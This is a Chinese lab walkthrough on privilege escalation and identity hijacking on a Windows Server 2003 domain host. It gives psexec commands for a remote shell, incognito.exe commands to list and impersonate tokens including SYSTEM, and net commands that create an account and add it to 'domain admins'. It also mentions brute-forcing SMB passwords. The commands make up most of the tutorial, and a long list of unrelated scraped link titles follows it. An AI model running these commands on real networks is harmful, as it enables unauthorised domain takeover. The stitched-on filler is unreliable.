incognito是在kali上可以使用来进行提权的,主要的作用是用于进行提权的或者用来劫持身份的.如果需要进行这些操作,前提是需要开启smb服务,也就是445端口才可以,可以使用一些工具进行爆破smb的账号和密码.

  • 以下实验用到的是一台03的服务器和一台win7的攻击机.
  • 03的ip地址为:192.168.0.212,账号为1,密码也是1
  • win7的ip地址为:192.168.0.207

1.使用psexec软件进行远程调用03cmd的cmd.

win7执行以下命令:psexec.exe \192.168.0.212 -u 1 -p 1 cmd

2.使用普通用户进行劫持域管理的身份.前提是03必须是加入域中,并且03是存在abc\administrator的用户身份进程.也就是曾经使用过03登录域服务器的.从而进行劫持身份,然后创建一个新的域管理员进行其他的操作.

1.incognito.exe -h 192.168.0.212 -u 1 -p 1 list_tokens -u  #查找03的可用身份进行劫持
2.incognito.exe -h 192.168.0.212 -u 1 -p 1 execute -c "NT AUTHORITY\SYSTEM" cmd.exe   #劫持system身份
3.然后使用cmd命令进行创建一个域控出来,因为这个域控的身份是有可能失效的.
net user 1 1 /domain /add #创建域账号
net group "domain admins" 1 /domain /add #添加到域控组中

使用incognito劫持身份psexec调用远程cmd相关推荐

  1. 【PSTOOLS】PSEXEC 启动远程机器上的程序没有UI显示

    c:\pstools\psexec \\172.168.0.9 -u username -p password -i 4  -d c:\abc.exe 上面的例子是调用远程机器上的abc.exe并且显 ...

  2. php语言smtp类,php mailer类调用远程SMTP服务器发送邮件实现方法

    这篇文章主要介绍了php mailer类调用远程SMTP服务器发送邮件实现方法,结合实例形式分析了php mailer类的调用及邮件发送相关技巧,需要的朋友可以参考下 本文实例讲述了php maile ...

  3. discuz云平台报调用远程接口失败的问题分析和解决

    根据网络两篇文章整理 问题描述: 当开通或关闭某个云平台服务的时候,报如下错误信息: 调用远程接口失败.请检查您的服务器是否处于内网以及您服务器的防火墙设置. 云平台测试站点的接口文件正常,于是开始在 ...

  4. 通过ssl调用远程WebService

    一般情况下调用远程WebService通过代理类直接访问就可以,可是如果WebService是在https站点下,调用时就要分情况考虑了,整理了一下: 1.客户端证书已正确安装 指已经在客户端安装了客 ...

  5. python 如何调用远程接口

    在python中我们可以使用requests模块来实现调用远程接口 一.安装requests模块 pip install requests 二.使用requests模块实现get方式调用远程接口 使用 ...

  6. python调用远程的python文件_python 实现调用远程接口

    在python中我们可以使用requests模块来实现调用远程接口 一:安装requests模块 pip install requests 二:使用requests模块实现get方式调用远程接口 使用 ...

  7. 计算机 注册表 远程桌面,仅允许运行使用网络级别身份验证的远程桌面计算机连接失败处理方法(远程桌面连接)...

    计算机在开启远程桌面的时候选中了"仅允许运行使用网络级别身份验证的远程桌面计算机连接",于是连接时提示错误如下: 远程计算机需要网络级别身份验证,而您的计算机不支持该验证,请联系您 ...

  8. 调用远程接口上传文件

    问题描述:第三方写了一个文件上传的接口,该接口的请求方式为Post请求,请求参数全部是以form-data表单形式进行提交,包含三个参数 第一个:cookie(字符串类型) 第二个:seqNo(字符串 ...

  9. WebService工具类调用远程接口服务时java.io.IOException: Server returned HTTP response code: 500 for URL XXX

    问题描述:在本地测试时,使用个人封装的Webservice代码工具类调用远程接口服务时,一切正常.但是一旦将该代码放到一个已有项目的中使用时,就会出现如下所示的错误提示 java.io.IOExcep ...

最新文章

  1. R语言警告:Cannot compute exact p-value with ties的处理方法
  2. dram和nand哪个难生产_DRAM与NAND差别这么大,存储之争都争啥?-嵌入式系统-与非网...
  3. 中商惠民签约神策数据 致力为客户提供最优服务模式
  4. 3DSlicer24:Module-Create Scripted
  5. 曹大带我学 Go(7)—— 如何优雅地指定配置项
  6. 在MAC Xcode下安装OpenCV
  7. mybatis系列-06-输入映射
  8. NestedScrollView、RecycleView、ViewPager 嵌套常见问题
  9. 计算两个日期相差天数的最简洁的代码
  10. Windows 7丢失用户、密码解决办法-我体验了!
  11. 【linux】如何查看和解压缩rpm文件内容
  12. Java中的数据类型
  13. TDSQL TCA 分布式实例特点初探--分布表和SQL透传
  14. 一行代码实现网站移动化的原理与实现
  15. AMR文件结构解析——时长解析
  16. 强烈推荐33个 GitHub 前端学习资源
  17. VisualC++逆序存放
  18. texstudio 官网打不开
  19. Indian_pines 高光谱图像数据集的处理(1)
  20. centos 安装mysql5.6.22_centos 7.0 编译 安装mysql 5.6.22 过程 已完成~ 成功~ 撒花~

热门文章

  1. 国科大计算机控制学院与计算机所,计算所与国科大喜获SIGCSE会议论文录用,科教融合再添硕果...
  2. 黑马程序员—专题三:黑马学院周边环境——睁大你的眼睛看清楚哦
  3. 合并C#的控件tableLayoutPanel中的行和列
  4. OPPOFindX5Pro和中兴Axon40Ultra哪个配置好 哪个更值得买
  5. 腾讯定位服务使用教程Android版
  6. 常用装机天梯图汇总+均衡主机配置单
  7. CSA实现单点登录原理详解 ,如何判断访问不同域名时用户是否登录
  8. somatic和germline突变有什么区别
  9. android Inflater
  10. 载噪比C/N和信噪比S/N